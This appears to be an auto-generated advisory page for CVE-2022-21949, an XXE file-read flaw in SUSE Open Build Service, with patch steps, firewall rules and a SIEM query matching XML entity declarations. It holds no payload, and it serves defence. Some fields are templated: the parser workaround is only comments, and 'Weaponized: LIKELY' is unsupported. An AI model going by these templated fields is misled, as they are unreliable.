CVE-2022-21949 – CVE-2022-21949 is an XXE (XML External Entity) ... (How to Fix)

Q: What is the severity of CVE-2022-21949?

CVE-2022-21949 has a CVSS score of 8.8 (HIGH). CVE-2022-21949 is an XXE (XML External Entity) vulnerability in SUSE Open Build Service that allows attackers to read arbitrary files from the server filesystem. This information disclosure can be leveraged to escalate privileges to Admin level. Affects all Open Build Service installations prior to version 2.10.13.

📋 TL;DR

CVE-2022-21949 is an XXE (XML External Entity) vulnerability in SUSE Open Build Service that allows attackers to read arbitrary files from the server filesystem. This information disclosure can be leveraged to escalate privileges to Admin level. Affects all Open Build Service installations prior to version 2.10.13.

💻 Affected Systems

Products:

SUSE Open Build Service

Versions: All versions prior to 2.10.13

Operating Systems: Linux (SUSE and other distributions running OBS)

Default Config Vulnerable: ⚠️ Yes

Notes: Affects all default installations of OBS. The vulnerability exists in XML processing operations.

📦 What is this software?

Open Build Service by Opensuse

View all CVEs affecting Open Build Service →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full admin privilege escalation leading to complete system compromise, data theft, and potential lateral movement within the infrastructure.

🟠

Likely Case

Information disclosure of sensitive files (configuration files, credentials, source code) leading to privilege escalation within OBS.

🟢

If Mitigated

Limited information disclosure if external entity processing is disabled or proper input validation is implemented.

🌐 Internet-Facing: HIGH - OBS instances exposed to the internet are directly vulnerable to remote exploitation.

🏢 Internal Only: MEDIUM - Internal attackers with network access can exploit this vulnerability.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires access to XML processing endpoints but is technically straightforward once access is obtained.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.10.13

Vendor Advisory: https://bugzilla.suse.com/show_bug.cgi?id=1197928

Restart Required: Yes

Instructions:

1. Backup your OBS configuration and data. 2. Update to Open Build Service version 2.10.13 or later. 3. Restart the OBS service. 4. Verify the update was successful.

🔧 Temporary Workarounds

Disable XML external entity processing

linux

Configure XML parsers to disable external entity resolution

# Configure OBS XML parser settings to disable external entities
# Edit OBS configuration to set XML parsing security features

Network segmentation

linux

Restrict access to OBS XML processing endpoints

# Use firewall rules to limit access to OBS services
iptables -A INPUT -p tcp --dport [OBS_PORT] -s [TRUSTED_NETWORK] -j ACCEPT
iptables -A INPUT -p tcp --dport [OBS_PORT] -j DROP

🧯 If You Can't Patch

Implement strict network access controls to limit who can reach OBS XML endpoints
Monitor for unusual XML processing requests and file access patterns

🔍 How to Verify

Check if Vulnerable:

Check OBS version: if version is less than 2.10.13, system is vulnerable

Check Version:

obs_admin --version or check OBS web interface version

Verify Fix Applied:

Confirm OBS version is 2.10.13 or higher and test XML processing endpoints for XXE

📡 Detection & Monitoring

Log Indicators:

Unusual XML requests with external entity references
File read operations from unexpected processes
Authentication attempts from new admin users

Network Indicators:

XML requests containing SYSTEM or PUBLIC DTD declarations
Outbound connections from OBS to external servers during XML processing

SIEM Query:

source="obs_logs" AND ("<!ENTITY" OR "SYSTEM" OR "PUBLIC") AND NOT expected_xml_pattern

📊 Metadata

CVE ID: CVE-2022-21949

CVSS v3 Score: 8.8 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-611

Published: May 3, 2022

Last Updated: November 21, 2024

🔗 References

https://bugzilla.suse.com/show_bug.cgi?id=1197928 Issue Tracking,Vendor Advisory
https://bugzilla.suse.com/show_bug.cgi?id=1197928 Issue Tracking,Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2022-21949, you might also want to check these: